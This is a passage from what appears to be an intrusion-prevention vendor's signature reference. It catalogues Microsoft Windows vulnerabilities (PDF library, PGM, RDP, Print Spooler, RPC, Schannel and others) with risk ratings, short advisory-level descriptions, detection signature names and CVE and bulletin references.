There is a code execution vulnerability in Microsoft Windows.

Situation:

File-Binary_Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426
File-Exe_Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426

References:

CVE-2015-2426
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2426

Microsoft-Windows-PDF-Library-CVE-2016-0117-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-748-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a code execution vulnerability in Windows PDF library.

Situation:

File-PDF_Microsoft-Windows-PDF-Library-CVE-2016-0117-Code-Execution

References:

CVE-2016-0117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0117

MS16-028
http://technet.microsoft.com/security/bulletin/MS16-028

Microsoft-Windows-PDF-Library-CVE-2016-3319-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-797-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out-of-bounds write vulnerability in the PDF library in Microsoft Windows. A remote attacker could use this to execure arbitrary code on the affected system.

Situation:

File-PDF_Microsoft-Windows-PDF-Library-CVE-2016-3319-Memory-Corruption

References:

CVE-2016-3319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3319

MS16-102
http://technet.microsoft.com/security/bulletin/MS16-102

Microsoft-Windows-PDF-Library-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-992-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability has been reported in Microsoft Windows PDF library.

Situation:

File-PDF_Microsoft-Windows-PDF-Library-Heap-Based-Buffer-Overflow

References:

CVE-2017-8728
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8728

Microsoft-Windows-PDF-Library-PostScript-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-805-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in the Microsoft Windows PDF library

Situation:

File-PDF_Microsoft-Windows-PDF-Library-PostScript-Information-Disclosure

References:

CVE-2016-3374
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3374

MS16-115
http://technet.microsoft.com/security/bulletin/MS16-115

Microsoft-Windows-PE-File-DVRT-Parsing-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1643-5242

Last changed:

sgpkg-ips-1643-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

A denial of service vulnerability has been reported in Microsoft Windows kernel. The vulnerability is triggered when handling Dynamic Value Relocation Table (DVRT) data inside PE files. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted PE file to the target. Successful exploitation of this vulnerability can result in Denial of Service of the target machine.

Situation:

File-Exe_Microsoft-Windows-PE-File-DVRT-Parsing-Denial-Of-Service

References:

CVE-2023-24949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24949

ms23-may
http://technet.microsoft.com/security/bulletin/ms23-may

Microsoft-Windows-PE-File-Signature-Spoofing-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1300-5242

Last changed:

sgpkg-ips-1337-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Insufficient validation of PE file signatures causes a vulnerability in Windows.

Situation:

File-Exe_Microsoft-Windows-PE-File-Signature-Spoofing-Vulnerability
File-Exe_Conflicting-Content-Type-HTA

References:

CVE-2020-1599
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1599

Microsoft-Windows-PGM-Handling-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1645-5242

Last changed:

sgpkg-ips-1645-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

A remote code execution vulnerability has been reported for Pragmatic General Multicast in Microsoft Windows. The vulnerability is due to improper handling of the incoming PGM packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted RPC call to the victim server. Successful exploitation of this vulnerability can result in execution of arbitrary code within the kernel system.

Situation:

IPv4_Microsoft-Windows-PGM-Handling-Remote-Code-Execution

References:

CVE-2023-28250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28250

Microsoft-Windows-PGM-PARITY_PRM_TGS-Handling-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1644-5242

Last changed:

sgpkg-ips-1644-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Situation:

IPv4_Microsoft-Windows-PGM-PARITY_PRM_TGS-Handling-Code-Execution

References:

CVE-2023-29363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29363

Microsoft-Windows-PnP-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Microsoft Windows Plug and Play service (MS05-039)

Risk:

High

First detected in:

sgpkg-ips-34-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP SP1

Software:

UPnP

Type:

Buffer Overflow

Description:

Microsoft Windows Plug and Play service contains a buffer overflow vulnerability. Remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.

Situation:

Generic_MSRPC-Windows-PnP-Buffer-Overflow
MSRPC-TCP_CPS-Windows-PnP-Buffer-Overflow
MSRPC-TCP_CPS-Windows-PnP-Service-Remote-Access

References:

CVE-2005-1983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1983

BID-14513
http://www.securityfocus.com/bid/14513

OSVDB-18605
http://www.osvdb.org/18605

MS05-039
http://technet.microsoft.com/security/bulletin/MS05-039

Microsoft-Windows-PPTP-CVE-2022-23270

About this vulnerability:

A vulnerability in the handling of PTPP

Risk:

High

First detected in:

sgpkg-ips-1465-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a unauthenticated remote code execution vulnerability in Windows Server PPTP. Successful exploitation could lead in arbitrary code execution.

Situation:

PPTP_Windows-CVE-2022-23270

References:

CVE-2022-23270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23270

ms22-may
http://technet.microsoft.com/security/bulletin/ms22-may

Microsoft-Windows-PPTP-Protocol-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1496-5242

Last changed:

sgpkg-ips-1496-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in Microsoft Windows VPN component. The vulnerability is due to improper handling of PPTP packets. An remote, unauthenticated attacker could exploit these vulnerabilities by sending crafted requests. Successful exploitation results a in denial of service condition on the target system.

Situation:

PPTP_Microsoft-Windows-PPTP-Protocol-Denial-Of-Service

References:

CVE-2022-23253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23253

Microsoft-Windows-Pragmatic-General-Multicast-Allocatedatabuffer-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported for Pragmatic General Multicast in Microsoft Windows. The vulnerability is due to improper handling of the incoming PGM packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted PGM packet to the victim server. Successful exploitation of this vulnerability can result in arbitrary code execution in kernel space.

Situation:

IPv4_Microsoft-Windows-Pragmatic-General-Multicast-Allocatedatabuffer-Use-After-Free

References:

CVE-2024-38140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38140

Microsoft-Windows-Pragmatic-General-Multicast-Packet-Length-Integer-Underflow

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows detected

Risk:

High

First detected in:

sgpkg-ips-1645-5242

Last changed:

sgpkg-ips-1645-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A vulnerability in Pragmatic General Multicast in Microsoft Windows which allows remote attackers to cause a denial of service condition by sending specially crafted request to thet target server, due to improper handling of PGM packets.

Situation:

IPv4_Microsoft-Windows-Pragmatic-General-Multicast-Packet-Length-Integer-Underflow

References:

CVE-2023-24940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24940

Microsoft-Windows-Print-Spooler-RCE-CVE-2021-34527

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1366-5242

Last changed:

sgpkg-ips-1544-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a remote code execution vulnerability, publicly referred as PrintNightmare, in Windows Print Spooler. The vulnerability is due to a failure to restrict access to the functionality that allows adding printers and related drivers. This situation can be used to prevent untrusted sources from installing drivers.

Situation:

SMB-TCP_Microsoft-Windows-Print-Spooler-RCE-CVE-2021-34527
MSRPC-TCP_CPS-Microsoft-Windows-Print-Spooler-RCE-CVE-2021-34527

References:

CVE-2021-34527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527

Microsoft-Windows-Print-Spooler-Service-Buffer-Overflow-CVE-2009-0228

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-437-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Windows Print Spooler service. The vulnerability is due to lack of boundary check while processing RPC responses. A remote unauthenticated attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code with System level privileges on the vulnerable host. If the code execution attempt is carried out successfully, the behaviour of the target host is dependent on the intention of the injected code. If the attacker aims for denial of service, it could terminate the Print Spooler service along with other Windows services hosted within the same process.

Situation:

SMB-TCP_Microsoft-Windows-Print-Spooler-Service-Buffer-Overflow-CVE-2009-0228

References:

CVE-2009-0228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0228

BID-35206
http://www.securityfocus.com/bid/35206

OSVDB-54932
http://www.osvdb.org/54932

MS09-022
http://technet.microsoft.com/security/bulletin/MS09-022

Microsoft-Windows-QUIC-Transport-Parameters-Handling-Resource-Exhaustion

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1678-5242

Last changed:

sgpkg-ips-1678-5242

Platform:

Windows

Software:

<os>

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported in Microsoft Windows QUIC. The vulnerability is due to improper handling of the incoming QUIC traffic. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted packet to the target server. Successful exploitation could result in the denial of service on the target machine.

Situation:

HTTPS_CS-Microsoft-Windows-QUIC-Transport-Parameters-Handling-Resource-Exhaustion

References:

CVE-2023-36435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36435

ms23-oct
http://technet.microsoft.com/security/bulletin/ms23-oct

Microsoft-Windows-QUIC-Version-Negotiation-Packet-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft .NET Core

Risk:

High

First detected in:

sgpkg-ips-1674-5242

Last changed:

sgpkg-ips-1674-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Situation:

Generic_UDP-Microsoft-Windows-QUIC-Version-Negotiation-Packet-Handling-Denial-Of-Service

References:

CVE-2023-38171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38171

ms23-oct
http://technet.microsoft.com/security/bulletin/ms23-oct

Microsoft-Windows-Rdl-Service-Base24-Decoding-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

Moderate

First detected in:

sgpkg-ips-1779-5242

Last changed:

sgpkg-ips-1779-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Improper validation of messages sent to the Remote Desktop Licensing service causes a vulnerability in Windows. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Microsoft-Windows-Rdl-Service-Base24-Decoding-Remote-Code-Execution

References:

CVE-2024-38077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38077

Microsoft-Windows-Rdl-Service-Tlsrpcchallengeserver-Handling-Two-Vulnerabilities

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

Moderate

First detected in:

sgpkg-ips-1820-5242

Last changed:

sgpkg-ips-1820-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Situation:

MSRPC-TCP_CPS-Microsoft-Windows-Rdl-Service-Tlsrpcchallengeserver-Handling-Two-Vulnerabilities

References:

CVE-2024-38073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38073

Microsoft-Windows-RDS-DVC-Decompression-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows Remote Desktop.

Risk:

High

First detected in:

sgpkg-ips-1371-5242

Last changed:

sgpkg-ips-1371-5242

Platform:

Windows

Software:

Microsoft Windows Remote Desktop

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability in Microsoft Windows Remote Desktop, Windows versions 7,8,10, and Windows Server 2008, 2012, 2016, 2019, which allows remote attackers to execute arbitrary code by sending crafted requests to the target server, due to the improper validation when decompressing dynamic virtual channel PDUs.

Situation:

Generic_CS-Microsoft-Windows-RDS-DVC-Decompression-Heap-Buffer-Overflow

References:

CVE-2019-1181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1181

Microsoft-Windows-Remote-Assistance-Xxe-Injection-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1052-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There has been reported an XML external entity (XXE) injection vulnerability in the Remote Assistance component of Microsoft Windows. A remote attacker could gain information of file contents from the target system, if vulnerability is successfully exploited.

Situation:

File-TextId_Microsoft-Windows-Remote-Assistance-Xxe-Injection-Information-Disclosure

References:

CVE-2018-0878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0878

Microsoft-Windows-Remote-Code-Execution-CVE-2016-0015

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

File-RTF_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0015

References:

CVE-2016-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0015

MS16-007
http://technet.microsoft.com/security/bulletin/MS16-007

Microsoft-Windows-Remote-Code-Execution-CVE-2016-0016

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

File-OLE_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0016

References:

CVE-2016-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0016

MS16-007
http://technet.microsoft.com/security/bulletin/MS16-007

Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

File-OLE_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018
File-RTF_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018
File-TextId_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018

References:

CVE-2016-0018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0018

MS16-007
http://technet.microsoft.com/security/bulletin/MS16-007

Microsoft-Windows-Remote-Code-Execution-CVE-2018-8475

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1101-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a heap overflow vulnerability in Microsoft Windows. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Microsoft-Windows-Remote-Code-Execution-CVE-2018-8475

References:

CVE-2018-8475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8475

ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep

Microsoft-Windows-Remote-Desktop-Gateway-CVE-2020-0610-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

High

First detected in:

sgpkg-ips-1243-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Server

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in the Remote Desktop Gateway (RDP GW) service of Microsoft Windows Server. This vulnerability is due to improper processing of crafted RDP packets over UDP. A remote attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the attacker being able to execute arbitrary code with the privileges of the RDP Gateway service. An unsuccessful attack may result in the service abnormally terminating.

Situation:

Generic_UDP-Microsoft-Windows-Remote-Desktop-Gateway-CVE-2020-0610-Code-Execution

References:

CVE-2020-0610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0610

ms20-jan
http://technet.microsoft.com/security/bulletin/ms20-jan

Microsoft-Windows-Remote-Desktop-Licensing-Service-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

Moderate

First detected in:

sgpkg-ips-1786-5242

Last changed:

sgpkg-ips-1786-5242

Platform:

Windows

Software:

<os>

Type:

Directory Traversal

Description:

Improper validation of messages sent to the Remote Desktop Licensing service causes an arbitrary file deletion vulnerability in Windows. A successful exploitation allows an attacker to delete files on the target system.

Situation:

MSRPC-TCP_CPS-Microsoft-Windows-Remote-Desktop-Licensing-Service-Arbitrary-File-Deletion

References:

CVE-2024-43454
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43454

Microsoft-Windows-Remote-Desktop-Licensing-Service-Buffer-Overread

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

High

First detected in:

sgpkg-ips-1801-5242

Last changed:

sgpkg-ips-1801-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A buffer overread vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper validation of messages sent to the Remote Desktop Licensing service. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service. Successful exploitation could result in denial of service conditions on the target service.

Situation:

MSRPC-TCP_Microsoft-Windows-Remote-Desktop-Licensing-Service-Buffer-Overread

References:

CVE-2024-38071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38071

ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul

Microsoft-Windows-Remote-Desktop-Licensing-Service-Improper-Authentication

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

High

First detected in:

sgpkg-ips-1794-5242

Last changed:

sgpkg-ips-1794-5242

Platform:

Windows

Software:

<os>

Type:

Insecure Configuration

Description:

An improper authentication vulnerability has been reported in Windows Remote Desktop Licensing (RDL) Service. Successful exploitation could result in authentication bypass of the vulnerable service.

Situation:

MSRPC-TCP_Microsoft-Windows-RDL-Service-NTLM-Null-Session-Request

References:

CVE-2024-38099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38099

ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul

Microsoft-Windows-Remote-Desktop-Protocol-Denial-of-Service

About this vulnerability:

A Microsoft Windows Remote Desktop Protocol Denial of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Windows Remote Desktop

Type:

Input Validation

Description:

A vulnerability in Microsoft Windows Remote Desktop Protocol which allows remote attackers to cause a denial of service condition due to the process used to validate data contained in RDP messages.

Situation:

Generic_CS-Microsoft-Windows-Remote-Desktop-Protocol-Denial-of-Service

References:

CVE-2005-1218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1218

Microsoft-Windows-Remote-Desktop-Protocol-Vulnerability-CVE-2015-2373

About this vulnerability:

A remote code execution vulnerability in Microsoft Windows RDP server.

Risk:

Moderate

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows RDP server.

Situation:

Generic_CS-MS-Windows-RDP-Vulnerability-CVE-2015-2373

References:

CVE-2015-2373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2373

MS15-067
http://technet.microsoft.com/security/bulletin/MS15-067

Microsoft-Windows-Remote-Desktop-Protocol-Websocketserver-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1817-5242

Last changed:

sgpkg-ips-1832-5242

Platform:

Windows

Software:

Microsoft Windows Remote Desktop

Type:

Race Condition

Description:

A remote code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to a use-after-free condition triggered in the WebSocketServer component of the Remote Desktop Protocol Server when handling unexpected WebSocket disconnections. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service. Successful exploitation could result in execution of arbitrary code in the context of the vulnerable service.

Situation:

HTTP_CSH-Microsoft-Windows-Remote-Desktop-Protocol-Over-WebSocket

References:

CVE-2024-43582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43582

Microsoft-Windows-Remote-Desktop-Services-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows Remote Desktop Services

Risk:

High

First detected in:

sgpkg-ips-1190-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Windows Remote Desktop

Type:

Buffer Overflow

Description:

A vulnerability in the Remote Desktop Services component of Microsoft Windows which allows remote attackers to execute arbitrary code by sending crafted requests to the target server, due to the improper validation when decompressing dynamic virtual channel PDUs.

Situation:

Generic_CS-Microsoft-Windows-Remote-Desktop-Services-Heap-Buffer-Overflow

References:

CVE-2019-1182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1182

Microsoft-Windows-Remote-Desktop-Usage

About this vulnerability:	Microsfot Windows Remote Desktop usage
Risk:	Low
First detected in:	sgpkg-ips-275-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Microsoft Windows operating system contains a built-in remote control application, Remote Desktop. It allows sharing of desktop connections across machines. Use of this kind of application may be considered a security risk in controlled environments.
Situation:	Generic_CS-Microsoft-Windows-Remote-Desktop-Connection-Attempt

Microsoft-Windows-Remote-Procedure-Call-Vulnerability

About this vulnerability:

A vulnerability Microsoft Windows RPC

Risk:

Moderate

First detected in:

sgpkg-ips-536-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP3;Windows XP 64-bit SP2;Windows 2003;Windows 2003 SP2;Windows Vista;Windows Vista SP2;Windows 2008;Windows 7;Windows 2008 R2;Windows 8;Windows 2012;Windows RT;Windows 2012

Software:

RPC

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows Remote Procedure Call (RPC).

Situation:

Analyzer_Microsoft-Windows-Remote-Procedure-Call-Vulnerability

References:

CVE-2013-3175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3175

MS13-062
http://technet.microsoft.com/security/bulletin/MS13-062

Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability

About this vulnerability:

A code execution vulnerability in Microsoft Windows' resource URI protocol handler

Risk:

High

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in the resource protocol handler in Microsoft Windows. The vulnerability is caused by the lack of proper validation of API parameters. An attacker can exploit the vulnerability for code execution by manipulating an application into making API calls with malformed parameters. Any code injected into the application would be executed within the security context of the currently logged in user.

Situation:

HTTP_Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability
File-Text_Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability

References:

CVE-2007-2219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2219

BID-24370
http://www.securityfocus.com/bid/24370

OSVDB-35341
http://www.osvdb.org/35341

MS07-035
http://technet.microsoft.com/security/bulletin/MS07-035

Microsoft-Windows-RPC-Runtime-Processbindackornak-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1477-5242

Last changed:

sgpkg-ips-1477-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Windows Remote Procedure Call. This vulnerability is due to improper checking of the size of bind_ack responses in the function ProcessBindAckOrNak in rpcrt4.dll. A remote attacker could exploit this vulnerability by enticing a user into connecting to an attacker-controlled RPC server and returning a crafted bind_ack response. Successfully exploiting this vulnerability could result in remote code execution in the context of the application making the RPC call.

Situation:

MSRPC_SS-Microsoft-Windows-RPC-Runtime-Processbindackornak-Integer-Overflow

References:

CVE-2022-26809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26809

ms22-apr
http://technet.microsoft.com/security/bulletin/ms22-apr

Microsoft-Windows-RRAS-Service-Out-Of-Bounds-Access

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1128-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An out of bounds access vulnerability has been reported in the Windows Routing and Remote Access (RRAS) Service. The vulnerability is due to improper handling RPC requests in Routing and Remote Access service. A remote attacker could exploit this vulnerability by sending maliciously crafted RPC requests to a target server running Routing and Remote Access service. Successful exploitation could result in execution of arbitrary code with SYSTEM privileges.

Situation:

SMB-TCP_Microsoft-Windows-RRAS-Service-Out-Of-Bounds-Access

References:

CVE-2017-11885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11885

ms17-dec
http://technet.microsoft.com/security/bulletin/ms17-dec

Microsoft-Windows-Schannel-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-617-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A remote code execution vulnerability exists in Microsoft SChannel. The vulnerability is due to improper processing of specially crafted packets that leads to a buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending specially crafted packets to the target machine. Successful exploitation could result in arbitrary code execution on the affected system.

Situation:

HTTPS_CS-Microsoft-Windows-Schannel-Buffer-Overflow
HTTPS_CS-Microsoft-Windows-Schannel-Buffer-Overflow-2

References:

CVE-2014-6321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6321

BID-70954
http://www.securityfocus.com/bid/70954

OSVDB-114506
http://www.osvdb.org/114506

MS14-066
http://technet.microsoft.com/security/bulletin/MS14-066

Microsoft-Windows-Scripting-Engines-Information-Disclosure-CVE-2011-0031

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-376-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 2008 R2

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_SS-Microsoft-Windows-Scripting-Engine-Information-Disclosure-CVE-2011-0031
File-Text_Microsoft-Windows-Script-Engine-Information-Disclosure-CVE-2011-0031

References:

CVE-2011-0031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0031

BID-46139
http://www.securityfocus.com/bid/46139

OSVDB-70827
http://www.osvdb.org/70827

MS11-009
http://technet.microsoft.com/security/bulletin/MS11-009

Microsoft-Windows-Scripting-Engines-Script-Encoding

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A memory corruption vulnerability exists in Microsoft Windows Scripting Engine. The flaw is due to a boundary error when decoding scripts in web pages. This vulnerability can be exploited by remote attacker to inject and execute arbitrary code on the target system.

Situation:

File-Text_Microsoft-Windows-Scripting-Engines-Script-Encoding

References:

CVE-2008-0083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0083

BID-28551
http://www.securityfocus.com/bid/28551

MS08-022
http://technet.microsoft.com/security/bulletin/MS08-022

Microsoft-Windows-Search-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in the Search component of Microsoft Windows. A remote attacker could use this to disclose information which could be used to further compromise the user's system.

Situation:

SMB-TCP_CS-Microsoft-Windows-Search-Information-Disclosure

References:

CVE-2017-8544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8544

ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun

